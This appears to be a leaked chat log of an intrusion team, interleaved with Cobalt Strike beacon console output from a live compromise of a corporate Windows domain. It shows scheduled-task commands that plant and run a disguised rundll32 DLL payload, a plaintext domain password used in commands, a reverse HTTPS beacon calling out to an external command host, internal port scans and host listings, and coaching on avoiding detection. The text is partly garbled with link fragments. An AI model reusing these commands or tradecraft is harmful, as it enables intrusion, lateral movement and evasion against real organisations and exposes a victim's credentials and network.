SLsvc.exe 1056 Services 0 9,808 K NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 1124 Services 0 11,412 K NT AUTHORITY\LOCAL SERVICE 0:00:12
svchost.exe 1184 Services 0 11,008 K NT AUTHORITY\SYSTEM 0:00:11
svchost.exe 1484 Services 0 17,628 K NT AUTHORITY\NETWORK SERVICE 0:00:03
svchost.exe 1608 Services 0 9,828 K NT AUTHORITY\LOCAL SERVICE 0:00:00
spoolsv.exe 1816 Services 0 9,508 K NT AUTHORITY\SYSTEM 0:00:01
armsvc.exe 1844 Services 0 3,660 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1860 Services 0 9,528 K NT AUTHORITY\SYSTEM 0:00:00
inetinfo.exe 1944 Services 0 13,524 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2024 Services 0 5,796 K NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 224 Services 0 3,092 K NT AUTHORITY\LOCAL SERVICE 0:00:00
tvnserver.exe 2088 Services 0 8,256 K NT AUTHORITY\SYSTEM 0:00:01
VGAuthService.exe 2152 Services 0 10,356 K NT AUTHORITY\SYSTEM 0:00:00
vmtoolsd.exe 2168 Services 0 43,536 K NT AUTHORITY\SYSTEM 0:33:04
svchost.exe 2184 Services 0 8,788 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2196 Services 0 2,236 K NT AUTHORITY\SYSTEM 0:00:00
WinCollectSvc.exe 2280 Services 0 9,876 K NT AUTHORITY\SYSTEM 0:48:11
taskeng.exe 2420 Services 0 8,132 K NT AUTHORITY\SYSTEM 0:00:01
WinCollect.exe 2540 Services 0 20,824 K NT AUTHORITY\SYSTEM 16:06:55
WmiPrvSE.exe 2876 Services 0 18,764 K NT AUTHORITY\NETWORK SERVICE 0:34:28
dllhost.exe 2960 Services 0 12,896 K NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 3208 Services 0 7,416 K NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 3520 Services 0 5,200 K NT AUTHORITY\NETWORK SERVICE 0:00:00
WmiPrvSE.exe 3624 Services 0 30,580 K NT AUTHORITY\SYSTEM 0:00:08
taskeng.exe 4008 Console 1 7,976 K LOOMIS\Administrator 0:00:00
dwm.exe 528 Console 1 4,492 K LOOMIS\Administrator 0:00:00
explorer.exe 1644 Console 1 26,724 K LOOMIS\Administrator 0:00:07
vmtoolsd.exe 3312 Console 1 9,608 K LOOMIS\Administrator 0:58:09
tvnserver.exe 3228 Console 1 3,924 K LOOMIS\Administrator 0:00:00
RouterNT.exe 784 Services 0 7,724 K NT AUTHORITY\SYSTEM 0:00:02
TrustedInstaller.exe 5556 Services 0 18,668 K NT AUTHORITY\SYSTEM 0:00:38
ManagementAgentNT.exe 1992 Services 0 6,616 K NT AUTHORITY\SYSTEM 0:02:41
swc_service.exe 1340 Services 0 5,212 K NT AUTHORITY\SYSTEM 0:00:00
SavService.exe 9812 Services 0 360,792 K NT AUTHORITY\LOCAL SERVICE 1:03:33
SAVAdminService.exe 7228 Services 0 5,704 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 4432 Services 0 23,152 K NT AUTHORITY\SYSTEM 0:00:01
ALsvc.exe 8796 Services 0 1,612 K NT AUTHORITY\SYSTEM 0:00:42
ALMon.exe 8220 Console 1 1,084 K LOOMIS\Administrator 0:00:17
mmc.exe 5264 Console 1 59,100 K LOOMIS\Administrator 0:00:01
LogonUI.exe 4536 Console 1 11,712 K NT AUTHORITY\SYSTEM 0:00:00
logon.scr 8492 Console 1 2,012 K LOOMIS\Administrator 0:00:00

``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=C3TcGDDgMrj49fiyP) on Metafile-vm1.loomisco.com mostly Sophos (av) processes which beacon?.and if you run it manually will it work ([ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jQku7Y4vPJaTCwZj2) what is installed may not be active, as a relic of some time with or without cmd, have tried[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=dTcLHjLTMgPAzLKoi) maybe better to look at the installed software and not the processes? try to remove it, so it was removed and the exe is still there?) try to add cmd /c rundll32 ...try to add at the beginning of cmd /c4 people can not find a possible error in the command? 4who works next to @user7 ?yes token@user9 under what conditions would this syntax be? shell tasklist /s /vdatasklist through shell go? and also, get in the habit of immediately deleting the stack behind you it will show and user from which to spin with the flag /v better check through tasclist?i can not see that the 4th point is done)[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=5ZBsdwsARrCBECn4d) :^)[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=DFqkE6RE5Be5i9EXb) please forward the message where i wrote how to determine)either the error in the /tr itself, or yes, i have prohibited to run the dll
>dNSHostName: Metafile-vm1.loomisco.com

dn:CN=METAFILE-VM1,OU=Block GPOs,OU=Unblocked,OU=Domain Servers,DC=loomisco,DC=com
>servicePrincipalName: TERMSRV/METAFILE-VM1
>servicePrincipalName: TERMSRV/Metafile-vm1.loomisco.com
>servicePrincipalName: HOST/METAFILE-VM1
>servicePrincipalName: HOST/Metafile-vm1.loomisco.com
```
no description, you can't tell from the name, spn 4 things, well where is it not running ?
beacon> shell schtasks /create /en loomisco.com\Omiller /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc ONCE /sd 10/04/2021 /ST 01:00 /f
[*] Tasked beacon to run: schtasks /create /en loomisco.com\Omiller /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc ONCE /sd 10/04/2021 /ST 01:00 /f
[+] host called home, sent: 199 bytes
[+] received output:
SUCCESS: The scheduled task "ManagementAgentNTT" has successfully been created.

beacon> shell schtasks /run /tn ManagementAgentNTT
[*] Tasked beacon to run: schtasks /run /tn ManagementAgentNTT
[+] host called home, sent: 67 bytes
[+] received output:
SUCCESS: Attempted to run the scheduled task "ManagementAgentNTT".

I wrote above) and how do I understand this pile of spn without a descriptiontype OU=Epic Server but there are some local tricks they have I understand the essence of looking at the names and do not understand what is there) the essence of sorting is to make it clear what the server has, or what it is for?
Data Transfer:
    IMAGING2-NEW.loomisco.com
What do we have here?
Block GPO:
    Metafile-vm1.loomisco.com
``okay1 minutesharfein can't run? ok, what do we have in the end?then we still need to finish sortingOthere I just do not know where to put, they have in hell so says other help @user7 then, because he again randomly pokes commandsa I noticed) on the comadu try)okay, @user9 a little joke more scolding do not want to delete the old task name the same name)`WARNING: The task name "ManagementAgentNTT" already exists. Do you want to replace it (Y/N)? `
how do i get around it ?how do i do that ? i wanted to write shell, but i got make_tokenmisklick
user 2-2 beacon> make_token
[-] make_token error: not enough arguments
[+] host called home, sent: 12 bytes
``just schtasks /ru "domain\user" /tn ....a since the context of the system you do not need to know his password and the user from which startsrun as cser parameter ``RU`@user9 made me laugh now let's take this move and impose on staskladno, I like your way of thinking))))))):weary:just in any unclear situation shoot ad@user9 to tears straight))))By local startup?danet)ah well shuffle_wasn't this task at all unexpectedly written))but it was funny why shoot@user9?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=Efj2zQJyESPcjTHtW) is already interesting to inject into the process datoken to run staks[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=f4hzmzfvnLpe6h6Cz) as an option, and in the context of user7 conditions?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=WKubqGyRhwrrAA97a) you can not token, full-fledged process kredami datoken Run remote1) anyone know how to solve the problem user7? I'll ask one question and please honestly[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=uSfseQBEapMAyKgsy) why? you saw it before, conditions are identical, how do you breathe under water? yes I think it is already clear since it does not give) so without /s` it will not create[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=PKw3CSaowHMBxJhxo) set parameters to create local shask what?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=CLgNf3DtfEyGnWYbq) 1)
2) @user7 already said that he tried 3 users and the error is the same[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=K4J6ek8dFxiMh8yjW) are you trying to create a task on a remote pc? but if yes it does not work please give me a hint how ? if it is possible to spam with the correct creeds need[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=iBbjX4DsGX4eGFQEX) colleagues, everyone has such a verdict?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=RNnr3nWrzskzwkfqG) did not fully understand the question, got it, then it turns out that not spam YES on this machine? so why are you writing them? credentials are not allowed on the local pktak? - the translation of the error at least he is watched by his team) i already wrote @user3 in lsd now rushed to tasks - they form lists of servers, yes user7 what the hell are you doing, start studying the output of commandsYou have 3 more pktsIs ANY user on the local machine + you write the LOCAL user? someone fucking reads the errors?I'll read it again@user8 wait not much IM Server, Central Server, Database server for multiple DBs with them it's clear RDS/IIS/SQL under 3 users writes that it is not allowed on this tachkse I see descriptions a bunch and almost all idnetic look[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=NGR2KngtpXvLpTGSk) understand what it needs[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=pvmiChf9wyQiRjDvL) silence? strange group do you put them in a separate group?
beacon> shell schtasks /create /s SCANSTORAGE /u loomisco.com\Shutdown /p p3bk@c1 /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc
[*] Tasked beacon to run: schtasks /create /s SCANSTORAGE /u loomisco.com\Shutdown /p p3bk@c1 /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc minute
[+] host called home, sent: 198 bytes
[+] received output:
ERROR: User credentials are not allowed on the local machine.

```
what to do ?try another user ?outside the domain
192.168.0.224:445 (platform: 500 version: 5.0 name: OCR1 domain: WORKGROUP)
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=KveRMautub3nMqcxD) 1 above file portscan.txk How do you scan the subnets? I think one by description? OK there is user RDS and RDS list by name, by group, by description, by process ``
>dNSHostName: TLCRDSLIC1.loomisco.com
>servicePrincipalName: WSMAN/TLCRDSLIC1
>servicePrincipalName: WSMAN/TLCRDSLIC1.loomisco.com
>servicePrincipalName: TERMSRV/TLCRDSLIC1
>servicePrincipalName: TERMSRV/TLCRDSLIC1.loomisco.com
>servicePrincipalName: RestrictedKrbHost/TLCRDSLIC1
>servicePrincipalName: HOST/TLCRDSLIC1
>servicePrincipalName: RestrictedKrbHost/TLCRDSLIC1.loomisco.com
>servicePrincipalName: HOST/TLCRDSLIC1.loomisco.com
There are lots of SPNs out there. What parameters should I look at to sort them? Anything that is groupedexchange, web, sql, dc, backup, ftp, etc. Try other options to get it in a different context and see what you can find:

```
DCs

TLCDC2
TLCDC1
-----
SQL

LOOMISBENSQL01
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=HW3uXYPkM8t8voqPD) which groups?
beacon> spawnas loomisco.com\Shutdown p3bk@c1 3333
[*] Tasked beacon to spawn windows/beacon_bind_pipe (\.\pipe\msagent_6736) as loomisco.com\Shutdown
[+] host called home, sent: 255580 bytes
[-] could not run C:\Windows\system32\mstsc.exe as loomisco.com\Shutdown: 5
[-] Could not connect to pipe: 2
``Other servers are sorted into groups while some are busy with shuffinder try the smb listener``.
beacon> spawnas loomisco.com\EDIADMIN APPSYS https
[*] Tasked beacon to spawn windows/beacon_https/reverse_https (oldplex.com:443) as loomisco.com\EDIADMIN
[+] host called home, sent: 261169 bytes
[-] could not run C:\Windows\system32\mstsc.exe as loomisco.com\EDIADMIN: 5
How do you spawn? No process YES, under it does not spawn works, does not work etc. I am waiting for some kind of a fitbaby guys, let's not be silent) not through make_token, but the full process from the domain admin process as above throw in a separate message host - OS and so on then full log files from the domain admin context run sharefinder until scanned in this form `` ``
192.168.0.1:445 (platform: 500 version: 6.3 name: WYOMISSING_EX1 domain: LOOMIS)
192.168.0.2:445 (platform: 500 version: 10.0 name: BRIGHTHEALTHSTA domain: LOOMIS)
192.168.0.5:445 (platform: 500 version: 5.0 name: IMAGING3 domain: LOOMIS)
192.168.0.25:445 (platform: 500 version: 6.2 name: LOOMISBENSQL01 domain: LOOMIS)
192.168.0.29:445 (platform: 500 version: 6.1 name: MDIETRICH domain: LOOMIS)

[+] received output:
192.168.0.43:445
192.168.0.45:445 (platform: 500 version: 6.1 name: EOBSTORAGE domain: LOOMIS)
192.168.0.57:445 (platform: 500 version: 6.1 name: LOOMISGT2 domain: LOOMIS)
192.168.0.68:445
192.168.0.69:445 (platform: 500 version: 6.1 name: LDSWYO21 domain: LOOMIS)
192.168.0.70:445
192.168.0.75:445 (platform: 500 version: 6.2 name: LOOMISBENSQL01 domain: LOOMIS)
192.168.0.83:445 (platform: 500 version: 6.1 name: LOOMISFAXR01 domain: LOOMIS)
192.168.0.86:445 (platform: 500 version: 10.0 name: JGUSS domain: LOOMIS)
192.168.0.91:445 (platform: 500 version: 10.0 name: TLCAUTOTF2 domain: LOOMIS)
192.168.0.97:445 (platform: 500 version: 10.0 name: DSCHAFFER domain: LOOMIS)
192.168.0.100:445 (platform: 500 version: 6.2 name: EPICAPM domain: LOOMIS)
192.168.0.107:445 (platform: 500 version: 6.1 name: JGUSSW7A domain: LOOMIS)
192.168.0.109:445 (platform: 500 version: 10.0 name: TLCSOPHOS domain: LOOMIS)
192.168.0.115:445 (platform: 500 version: 10.0 name: LOOMISINDIODB01 domain: LOOMIS)
192.168.0.116:445 (platform: 500 version: 6.1 name: WINDOWS7EXCEL domain: LOOMIS)
192.168.0.119:445 (platform: 500 version: 6.1 name: DSCHAFFER2 domain: LOOMIS)
192.168.0.127:445 (platform: 500 version: 6.1 name: KBRETON domain: LOOMIS)
192.168.0.135:445 (platform: 500 version: 6.1 name: LOOMISFAXR02 domain: LOOMIS)
192.168.0.183:445 (platform: 500 version: 6.3 name: VEEAMBACKUPS domain: LOOMIS)
192.168.0.184:445 (platform: 500 version: 10.0 name: IHCANSTATS1 domain: LOOMIS)
192.168.0.185:445 (platform: 500 version: 6.2 name: TLCANALYTICS1 domain: LOOMIS)
192.168.0.186:445 (platform: 500 version: 6.3 name: TLCMONITORING domain: LOOMIS)
192.168.0.188:445
192.168.0.189:445 (platform: 500 version: 10.0 name: INNOSTATS1 domain: LOOMIS)
192.168.0.191:445 (platform: 500 version: 6.1 name: TERMSRV domain: LOOMIS)
192.168.0.192:445 (platform: 500 version: 10.0 name: TLCDC1 domain: LOOMIS)
192.168.0.193:445 (platform: 500 version: 6.1 name: TERMSRV1 domain: LOOMIS)
192.168.0.194:445 (platform: 500 version: 10.0 name: ELIGSTATS1 domain: LOOMIS)
192.168.0.195:445 (platform: 500 version: 6.1 name: TRAVELER1 domain: LOOMIS)
192.168.0.196:445 (platform: 500 version: 6.1 name: IMAGING2-NEW domain: LOOMIS)
192.168.0.197:445 (platform: 500 version: 6.2 name: WEBCHAT domain: LOOMIS)
192.168.0.200:445
192.168.0.202:445 (platform: 500 version: 10.0 name: TLCSTORAGE1 domain: LOOMIS)
192.168.0.204:445 (platform: 500 version: 10.0 name: TLCAUTOTFR domain: LOOMIS)
192.168.0.205:445 (platform: 500 version: 10.0 name: PDFSTORAGE domain: LOOMIS)
192.168.0.214:445 (platform: 500 version: 6.1 name: TERMSRV5 domain: LOOMIS)
192.168.0.215:445 (platform: 500 version: 10.0 name: PDFSTORAGE domain: LOOMIS)
192.168.0.222:445 (platform: 500 version: 10.0 name: TLCDC2 domain: LOOMIS)
192.168.0.223:445 (platform: 500 version: 10.0 name: PDFSTORAGE domain: LOOMIS)
192.168.0.224:445 (platform: 500 version: 5.0 name: OCR1 domain: WORKGROUP)
192.168.0.231:445 (platform: 500 version: 10.0 name: TLCEPICAS01 domain: LOOMIS)
192.168.0.232:445 (platform: 500 version: 10.0 name: TLCEPICCS01 domain: LOOMIS)
192.168.0.233:445 (platform: 500 version: 10.0 name: TLCEPICDB01 domain: LOOMIS)
192.168.0.239:445 (platform: 500 version: 10.0 name: TLCSQLDB1 domain: LOOMIS)
192.168.0.242:445 (platform: 500 version: 10.0 name: TLCSKLM2 domain: LOOMIS)
192.168.0.247:445 (platform: 500 version: 10.0 name: TLCRDSLIC1 domain: LOOMIS)
192.168.0.248:445 (platform: 500 version: 5.0 name: METAFILE domain: LOOMIS)
192.168.0.249:445 (platform: 500 version: 6.1 name: SCANSTORAGE domain: LOOMIS)
192.168.0.250:445 (platform: 500 version: 10.0 name: TLCSKLM1 domain: LOOMIS)
192.168.0.252:445 (platform: 500 version: 6.1 name: STORAGE domain: LOOMIS)
``````
beacon> portscan 192.168.3.0/24 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 192.168.3.0/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '192.168.3.3' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.13' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.18' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.15' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.23' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.31' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.25' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.28' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.2' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.0' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.1' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.32' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.33' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.41' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.37' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.38' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.39' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.40' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.42' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.47' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.46' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '192.168.3.55' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.53' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.77' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.98' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.99' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.94' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '192.168.3.241' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.242' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '192.168.3.245' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.244' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.248' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.249' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.247' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.252' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.253' is alive. [read 8 bytes]
(ICMP) Target '192.168.3.255' is alive. [read 8 bytes]

[+] received output:
192.168.3.3:445 (platform: 500 version: 10.0 name: SUPPACCSTATS1 domain: LOOMIS)
192.168.3.18:445 (platform: 500 version: 6.1 name: SCALA1 domain: LOOMIS)
192.168.3.31:445 (platform: 500 version: 10.0 name: ESSEXO365 domain: LOOMIS)
192.168.3.32:445 (platform: 500 version: 10.0 name: SVALLON domain: LOOMIS)
192.168.3.41:445 (platform: 500 version: 6.0 name: PRINTSRV08 domain: LOOMIS)
192.168.3.55:445 (platform: 500 version: 10.0 name: TLCEPICCSR24 domain: LOOMIS)
192.168.3.94:445 (platform: 500 version: 10.0 name: MMALONEY domain: LOOMIS)
192.168.3.98:445 (platform: 500 version: 10.0 name: CPETERS domain: LOOMIS)
192.168.3.99:445 (platform: 500 version: 10.0 name: AFOLK2 domain: LOOMIS)
192.168.3.244:445 (platform: 500 version: 10.0 name: FSITRACK domain: LOOMIS)
192.168.3.245:445 (platform: 500 version: 10.0 name: TLCEPICIIS1 domain: LOOMIS)
192.168.3.247:445 (platform: 500 version: 10.0 name: COMMISSIONSTAT domain: LOOMIS)
192.168.3.248:445 (platform: 500 version: 10.0 name: PRINTSRV16 domain: LOOMIS)

[+] received output:
192.168.3.252:445 (platform: 500 version: 10.0 name: TLCEPICFAX domain: LOOMIS)
Scanner module is complete

``While the scanning is going on, if everything is clear, I thought there would be a question why) no questions about it no? yes ``portscan 192.168.0.0/24 445 icmp 1024` the result here all four at once I start or wait until each works? and run in turn at the end add `icmp 1024 `portscan 192.168.0.0/24 445[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jhx6mHCdctixMbnBK) before scanning the ports the command here192.186.1.0/24 not the experience of using the utility ping?) stop[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jhx6mHCdctixMbnBK) port scan to smb ports let's go ahead and agree that the work on the task min 10command ping, do sysadmins need to discuss this?
192.168.8.0/24
10.10.10.0/24
``the sticking point is, we do something, we can't do it, we ask you, all you give us is leading questions and vague answers like @user8 please make a list of subnets192.168.820 * 70 min100 / 5 = 2010.10.10.0 ping 5% of the workload for today`` ``
192.168.0.0/24
192.168.3.0/24
10.10.10.0/24
192.168.8.0/24
just let's do the math:waiting for the subnets who knows not to go to the darwin prize go to /24 mask70 minutes per ping this is a new record)fuck why do i have to repeat it twice? less than half of them removed``
mstsc.exe 4840 Services 0 13,640 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,216 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 12,944 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 2420 Services 0 20,184 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 3388 Services 0 14,380 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 1176 Services 0 12,052 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 1152 Services 0 11,964 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A

[+] received output:
mstsc.exe 4840 Services 0 13,608 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,384 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 13,200 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
``27-52second half of the hosts will arrive when the pings are done? it's been an hourI seeIt's been an hourIs this not a problem either? @user1 @user3 where is local control in groups? it's total anarchy leave yourself two sessions and sit in single sessionscall his pc to reboot and don't even think about jumping in winlogonI would be an advanced user opening tasklist and immediately see that something is wrong```
[+] received output:
mstsc.exe 4840 Services 0 13,640 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,216 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 12,944 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 2420 Services 0 20,184 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 3388 Services 0 14,380 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 1176 Services 0 12,052 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 1152 Services 0 11,964 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
``Work quietly I'll open the process sheet and delete all mstsc that I find and also needhost with this approach is the ip address written? or just the host - active? I know it's late.... but
```
$job = foreach($line in (Get-Content hostlist.txt)){


	if(Test-Connection -ComputerName $line -Count 1 -Quiet ){


		 Start-Sleep -s 3
	
		Write-Warning $line

		Write-output "$line - Active"
	}

}
$job | out-file alive.txt -Append
``I hope you're not scanning hosts 2-3 times, it's not funny, you're scanning 4 times too ``.
Pinging FSITrack.loomisco.com [192.168.3.244] with 32 bytes of data:
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127

Ping statistics for 192.168.3.244:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

beacon> shell ping PDFStorage.loomisco.com
[*] Tasked beacon to run: ping PDFStorage.loomisco.com
beacon> sleep 3
[*] Tasked beacon to sleep for 3s
[+] host called home, sent: 75 bytes
[+] received output:

Pinging PDFStorage.loomisco.com [192.168.0.223] with 32 bytes of data:
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.0.223:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

beacon> shell ping TLCSophos.loomisco.com
[*] Tasked beacon to run: ping TLCSophos.loomisco.com
beacon> sleep 3
[*] Tasked beacon to sleep for 3s
[+] host called home, sent: 74 bytes
[+] received output:

Pinging TLCSophos.loomisco.com [192.168.0.109] with 32 bytes of data:
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=K3mdi2PTiY8vpHpy2) no, the question was to the point about the launch prioritiesprivately look out for each other after all there are 6 people around you guys well honestly asked to keep it down, immediately removed `-n````
user 2-2 beacon> shell ping TLCBENTS02.loomisco.com
[*] Tasked beacon to run: ping TLCBENTS02.loomisco.com
[+] host called home, sent: 59 bytes
[+] received output:

Pinging TLCBENTS02.loomisco.com [192.168.8.166] with 32 bytes of data:
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127

Ping statistics for 192.168.8.166:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

user 2-2 beacon> shell ping TLCBENTS01.loomisco.com
[*] Tasked beacon to run: ping TLCBENTS01.loomisco.com
[+] host called home, sent: 59 bytes
[+] received output:

Pinging TLCBENTS01.loomisco.com [192.168.8.165] with 32 bytes of data:
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127

Ping statistics for 192.168.8.165:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=LbakdpdgYJKJn4bko) setlocal enabledelayedexpansion ?in an hour you can ping by hand pinging by hand, just sit on it for an hour[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=fodiBryiBJgkXd4bQ) anyone thought that if you catch an error in the console, it is logged somewhere on the server, or even some alert user I asked to do it quietly ping from each session run from all cobv file the same output is you from two cobv ping?in bicon the error is pinged above there was a check you also do not agree with each other with the same error i asked 2 hosts to check it has not changedchfile i can not see the file went to 692 that's why i asked to throw the command -output3388 not all sessions i see there and run the file i have `C:\Users\pgo.bat` and inside the batting you have a relative path to ping How do you think it will run?) you are in `C:\windows\system32\ping.exe` lies, you are in `C:\ProgramData\ping.bat` and run `ping` and has anyone thought about prioritization? specifically about the rat, remember I asked you about environment variables I *please ping 50 hosts as quietly and automatically as possible*
the rest of you: i'll do it!
@echo off
for /f %%i in (HOSTLIST.TXT) do (
	timeout /T 3 /nobreak
	ping %%i -n 1 -4 >> pingedhosts.txt
)
```
with this I do not understand what the problem is, yes the error, but the ping is passed, in the outfile is infarugaetsya not correctly assembled (again you poke everything in a row? What kind of house you have there `` ``
ss cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
